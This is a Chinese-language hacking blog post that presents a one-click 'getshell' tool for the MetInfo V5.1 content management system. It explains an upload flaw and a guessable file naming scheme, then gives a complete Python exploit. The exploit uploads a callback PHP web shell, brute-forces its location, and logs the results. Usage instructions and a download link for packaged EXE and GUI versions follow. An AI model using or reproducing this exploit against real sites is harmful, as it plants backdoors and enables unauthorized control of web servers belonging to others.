<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta http-equiv="Cache-Control" content="no-siteapp">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=1, minimum-scale=1, maximum-scale=1">
<meta name="renderer" content="webkit">
<meta name="google" value="notranslate">
<meta name="robots" content="index,follow">


<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Akkuman">
<meta name="twitter:description" content="Akkuman的技术博客">
<meta name="twitter:image:src" content="http://127.0.0.1:8000/images/avatar.png">

<meta property="og:url" content="http://127.0.0.1:8000">
<meta property="og:title" content="Akkuman">
<meta property="og:description" content="Akkuman的技术博客">
<meta property="og:site_name" content="Akkuman">
<meta property="og:image" content="http://127.0.0.1:8000/images/avatar.png">
<meta property="og:type" content="website">
<meta name="robots" content="noodp">

<meta itemprop="name" content="Akkuman">
<meta itemprop="description" content="Akkuman的技术博客">
<meta itemprop="image" content="http://127.0.0.1:8000/images/avatar.png">

<link rel="canonical" href="http://127.0.0.1:8000">

<link rel="shortcut icon" href="/favicon.png">
<link rel="apple-itouch-icon" href="/favicon.png">

<link type="text/css" rel="stylesheet" href="https://cdn.bootcss.com/bootstrap/4.0.0/css/bootstrap.min.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/prism.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/zoom.css">
<link type="text/css" rel="stylesheet" href="/bundle/css/main.css">
<script src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>



<script>var cPlayers = [];var cPlayerOptions = [];</script>


<script type="text/javascript">
    var timeSinceLang = {
        year: '年前',
        month: '个月前',
        day: '天前',
        hour: '小时前',
        minute: '分钟前',
        second: '秒前'
    };
    var root = '';
</script>


        <meta name="keywords" content="Hacker,Tools,">
        <meta name="description" content="MetInfo V5.1 GetShell一键化工具">
        <meta name="author" content="Akkuman">
        <title>MetInfo V5.1 GetShell一键化工具</title>
    </head>
    <body>
        
        <header id="header" class="clearfix">
  <div class="container-fluid">
      <div class="row">
          <div class="logo">
              <div class="header-logo">
                <script>
                  var getwbclass = function() {
                    var wbclass = ['b', 'w'];
                    return wbclass[Math.floor(Math.random()*wbclass.length)];
                  }
                  var sitetitle = "Akkuman";
                  for (i in sitetitle) {
                    document.write('<a href="/"><span class="' + getwbclass() + ' titlechar">' + sitetitle.charAt(i) + '</span></a>');
                  }          
                  
                </script>
                
                <a id="btn-menu" href="javascript:isMenu();">
                    <span class="b">·</span>
                </a>
                <a href="javascript:isMenu1();">
                    <span id="menu-1" class="bf">1</span>
                </a>
                <a href="javascript:isMenu2();">
                    <span id="menu-2" class="bf">2</span>
                </a>
                <a href="javascript:isMenu3();">
                    <span id="menu-3" class="bf">3</span>
                </a>
              </div>
              <div id="menu-page">
                <a href="/archive.html"><li>归档</li></a>
                <a href="/tag.html"><li>标签</li></a>
                
                <a href="/atom.xml"><li>订阅</li></a>
                
                <a href="about.html"><li>关于</li></a>
              </div>
              <div id="search-box">
                  <div id="search">
                      <input autocomplete="off" type="text" name="s" id="menu-search" placeholder="搜索..." data-root="" />
                  </div>
              </div>
          </div>
      </div>
  </div>
  </header>
        <div id="body" class="clearfix">
            <div class="container-fluid">
                <div class="row">
                    <div id="main" class="col-12 clearfix" role="main">
                        <article class="posti" itemscope itemtype="http://schema.org/BlogPosting">
                            <h1 class="post-title" itemprop="name headline">MetInfo V5.1 GetShell一键化工具</h1>
                            <div class="post-meta">
                                <p>
                                    Written by <a itemprop="name" href="/about.me.html" rel="author">Akkuman</a> with ♥ on <time datetime="1465396832" itemprop="datePublished"></time> in <a href="/tag/Hacker/index.html">Hacker </a><a href="/tag/Tools/index.html">Tools </a>
                                </p>
                            </div>
                            <div class="post-content" itemprop="articleBody">
                                <hr />

<h1>漏洞解析：</h1>

<hr />

<p><strong>config/config.inc.php</strong></p>

<pre><code class="language-php">$langoks = $db-&gt;get_one(&quot;SELECT * FROM $met_lang WHERE lang='$lang'&quot;);

if(!$langoks)die('No data in the database,please reinstall.');

if(!$langoks[useok]&amp;&amp;!$metinfoadminok)okinfo('../404.html');

if(count($met_langok)==1)$lang=$met_index_type;

$query = &quot;SELECT * FROM $met_config WHERE lang='$lang' or lang='metinfo'&quot;;//看这里

$result = $db-&gt;query($query);

while($list_config= $db-&gt;fetch_array($result)){

	if($metinfoadminok)$list_config['value']=str_replace('&quot;', '&amp;#34;', str_replace(&quot;'&quot;, '&amp;#39;',$list_config['value']));

	$settings_arr[]=$list_config;

	if($list_config['columnid']){

		$settings[$list_config['name'].'_'.$list_config['columnid']]=$list_config['value'];

	}else{

		$settings[$list_config['name']]=$list_config['value'];

	}

}

@extract($settings);
</code></pre>

<hr />

<p>访问</p>

<p>http:///localhost/metinfo5.1/index.php?lang=metinfo</p>

<p><code>SELECT * FROM met_config WHERE lang='metinfo' or lang='metinfo'</code></p>

<hr />

<h2>文件命名方式：</h2>

<hr />

<p><strong>/feedback/uploadfile_save.php</strong></p>

<pre><code class="language-php">srand((double)microtime() * 1000000);

$rnd = rand(100, 999);

$name = date('U') + $rnd;

$name = $name.&quot;.&quot;.$ext;

</code></pre>

<p><strong>文件保存在/upload/file/目录</strong></p>

<p>命名方式就是时间戳去掉后三位，紧接着一个三位数的随机数</p>

<p>可爆破：</p>

<p>如</p>

<p><a href="http://127.0.0.1/upload/file/1465394396.php">http://127.0.0.1/upload/file/1465394396.php</a></p>

<hr />

<h1>一键化利用工具：</h1>

<hr />

<p><strong>本程序基于python编写</strong></p>

<pre><code class="language-python">#!/usr/bin/env python
#-*- coding: utf-8 -*-

import requests
import Queue
import threading
import time
import sys


headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.10 Safari/537.36'}

urls = Queue.Queue()
#http://hb.jhxjd.com/upload/file/1441445378.php

def bp(urls,time_out):
    while not urls.empty():
        base_url = urls.get()
        response = None

        try:
            time.sleep(int(time_out))#延时设置
            response = requests.get(base_url,headers=headers)
            if response.status_code == 404:
                print 'Not Fount----%s\n' % base_url
        except:
            continue
        finally:
            if response:
                with open('url.txt','a+') as f:
                    f.write('%s?e=YXNzZXJ0\n'%base_url)

def main(target_url,thread_num,time_out):

    #取出当前时间戳并删除后四位
    now = str(int(time.time()))[:-4]

    #将所有的待爆破地址遍历并加入队列
    for i in range(0,10):
        for j in range(100,1000):
            num_str = ''.join((str(i),str(j)))
            url = ''.join(('%s/upload/file/%s' % (target_url,now),num_str,'.php'))
            urls.put(url)

    #上传文件
    with open('xiaoma.php','w+') as fi:
        fi.write(&quot;&lt;?php $e = $_REQUEST['e'];register_shutdown_function(base64_decode($e), $_REQUEST['Akkuman']);?&gt;&quot;)
    data = {
            'fd_para[1][para]':'filea',
            'fd_para[1][type]':'5'
            }
    files = {'filea': open(&quot;xiaoma.php&quot;, 'rb')}
    upload_url = '%s/feedback/uploadfile_save.php?met_file_format=pphphp&amp;met_file_maxsize=9999&amp;lang=metinfo' % target_url
    res = requests.post(upload_url,data = data,files=files)
    #等待两秒  文件上传
    time.sleep(2)




    #启动多线程
    for i in range(int(thread_num)):
        t = threading.Thread(target = bp,args=(urls,time_out,))
        t.start()


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print 'Example : %s http://www.xxx.com 20 0' % sys.argv[0]
    else:
        main(sys.argv[1],sys.argv[2],sys.argv[3])

</code></pre>

<p>程序略显粗糙</p>

<p>为了方便，我也把他打包成了<strong>exe</strong></p>

<p>然后闲着没事，想着简单地给他做了个<strong>界面</strong>,这样的
<img src="" data-src="http://7xusrl.com1.z0.glb.clouddn.com/MetInfo5.1GetshellGui.png" alt="GUI" /></p>

<hr />

<h1>文件说明</h1>

<hr />

<blockquote>
<p>MetInfo V5.1上传漏洞getshell利用工具</p>

<p>作者 : Akkuman</p>

<p>漏洞原理详见<a href="http://www.wooyun.org/bugs/wooyun-2010-0139168">http://www.wooyun.org/bugs/wooyun-2010-0139168</a></p>

<p>使用说明：
本目录有两个文件，一个py，一个exe
因为exe是py文件打包而成，故文件较大
64位系统测试使用通过</p>

<p>如果你安装了py2.x环境  py文件使用方法
打开cmd
python baopo.py <a href="http://www.xxx.com">http://www.xxx.com</a> 20 0
20是线程数，0是每次请求等待时间（网站限制时可设置为2或3）可以自己指定</p>

<p>exe命令行文件使用方法
打开cmd
baopo.exe <a href="http://www.xxx.com">http://www.xxx.com</a> 20 0
20是线程数，0是每次请求等待时间（网站限制时可设置为2或3）可以自己指定</p>

<p>GUI程序，应该不用说</p>

<p>关于getshell与结果
上传的是回调一句话木马</p>

<pre><code class="language-php">&lt;?php &gt;$e=$_REQUEST['e'];register_shutdown_function(base64_decode($e),$_&gt;REQUEST['Akkuman']);?&gt;
</code></pre>

<p>菜刀连接，密码是Akkuman</p>

<p>爆破结果会生成在<strong>url.txt</strong></p>
</blockquote>

<hr />

<h1>下载地址：</h1>

<hr />

<p><a href="http://cloud.189.cn/t/v263QbMJVJ3u">(访问码:1475)</a></p>

<p><em>转载请注明出处</em></p>

<p><em>作者博客 hacktech.cn | 53xiaoshuo.com</em></p>

                            </div>
                            <div style="display:block;" class="clearfix">
                                <section style="float:left;">
                                    <span itemprop="keywords" class="tags">
                                        tag(s): <a href="/tag/Hacker/index.html">Hacker </a><a href="/tag/Tools/index.html">Tools </a>
                                    </span>
                                </section>
                                <section style="float:right;">
                                    <span><a id="btn-comments" href="javascript:isComments();">show comments</a></span> · <span><a href="javascript:goBack();">back</a></span> · 
                                    <span><a href="/">home</a></span>
                                </section>
                            </div>
                            



<div id="comments" class="gen">
    <script>
        document.write('<section id="disqus_thread"></section>');
        var site_comment_load = function disqus() {
            var d = document, s = d.createElement('script');
            s.src = '//Akkum4n.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        }
    </script>
</div>

                        </article>
                    </div>
                </div>
            </div>
        </div>
        <footer id="footer" role="contentinfo">
    <div class="container-fluid">
        <div class="row">
        <div class="col-12">
            &copy; 
            <script type="text/javascript">
                document.write(new Date().getFullYear());
            </script>
            <a href="/">Akkuman</a>.
            Using <a target="_blank" href="http://www.chole.io/">Ink</a> & <a target="_blank" href="/">Story</a>.
        </div>
        </div>
    </div>
</footer>

<script src="https://cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="/bundle/js/prism.js"></script>
<script src="/bundle/js/zoom-vanilla.min.js"></script>
<script src="/bundle/js/main.js"></script>

<script>
    window.onload=function(){
        if (window.location.hash!='') {
          var i=window.location.hash.indexOf('#comment');
          var ii=window.location.hash.indexOf('#respond-post');
          if (i != '-1' || ii != '-1') {
            document.getElementById('btn-comments').innerText='hide comments';
            document.getElementById('comments').style.display='block';
          }
        }
    }

    function isMenu(){
        if(document.getElementById('menu-1').style.display=='inline'||document.getElementById('menu-1').style.display=='block'){
            $('#search-box').fadeOut(200);
            $('#menu-page').fadeOut(200);
            $('#menu-1').fadeOut(500);
            $('#menu-2').fadeOut(400);
            $('#menu-3').fadeOut(300);
        } else {
            $('#menu-1').fadeIn(150);
            $('#menu-2').fadeIn(150);
            $('#menu-3').fadeIn(150);
        }
    }

    function isMenu1(){
        if(document.getElementById('menu-page').style.display=='block'){
            $('#menu-page').fadeOut(300);
        } else {
            $('#menu-page').fadeIn(300);
        }
    }

    function isMenu2(){
        if(document.getElementById('torTree')){
            if(document.getElementById('torTree').style.display=='block'){
                $('#torTree').fadeOut(300);
            } else {
                $('#torTree').fadeIn(300);
            }
        }
    }

    function isMenu3(){
        if(document.getElementById('search-box').style.display=='block'){
            $('#search-box').fadeOut(300);
        } else {
            $('#search-box').fadeIn(300);
        }
    }

    function isComments(){
        if(document.getElementById('btn-comments').innerText=='show comments'){
            document.getElementById('btn-comments').innerText='hide comments';
            document.getElementById('comments').style.display='block';
            site_comment_load();
        } else {
            document.getElementById('btn-comments').innerText='show comments';
            document.getElementById('comments').style.display='none';
        }
    }

    function Search404(){
        $('#menu-1').fadeIn(150);
        $('#menu-2').fadeIn(150);
        $('#menu-3').fadeIn(150);
        $('#search-box').fadeIn(300);
    }

    function goBack(){
        window.history.back();
    }
</script>


<script async>
"use strict";
(function(){
var cp = function(){
    var len = cPlayerOptions.length;
    for(var i=0;i<len;i++){
        var element = document.getElementById('player' + cPlayerOptions[i]['id'])
        while (element.hasChildNodes()) {
            element.removeChild(element.firstChild);
        };
        cPlayers[i] = new cPlayer({
            element: element,
            list: cPlayerOptions[i]['list'],
            });
    };
    cPlayers = [];cPlayerOptions = [];
};
var script = document.createElement('script');
script.type = "text/javascript";
script.src = "https://cdn.bootcss.com/cplayer/3.2.1/cplayer.js";
script.async = true;
if(script.readyState){  
    script.onreadystatechange = function(){
        if (script.readyState == "loaded" ||
            script.readyState == "complete"){
            script.onreadystatechange = null;
            cp();
        }
    };
}else{  
    script.onload = function(){
        cp();
    };
}
document.head.appendChild(script);
})();
</script>

    </body>
</html>
